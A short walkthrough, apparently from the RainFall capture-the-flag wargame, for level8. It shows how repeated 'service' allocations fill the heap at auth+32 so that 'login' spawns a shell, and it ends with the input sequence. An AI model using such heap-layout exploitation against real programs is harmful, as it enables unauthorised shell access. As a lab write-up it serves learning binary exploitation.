# level8

- We see that if auth+32 is not empty we will have a shell

- `auth ` is a malloc of 4

- `service` is strdup(len(input))

- So we can try to put value at auth + 32 since it's out of the allocated space

- ```
  level8@RainFall:~$ ./level8
  (nil), (nil)
  auth 
  0x804a008, (nil)
  ```

- So we need something at `0x804a008+32` = `0x804a028`, `service` does not free and allocate after the other one so we can try to type service multiple time

- ```
  service
  0x804a008, 0x804a018
  service
  0x804a008, 0x804a028
  ```

- Now that we have something at auth+32 we can try login :
  ```
  login
  $
  ```

- To summarize :
  ```
  auth (with space)
  service
  service
  login
  ```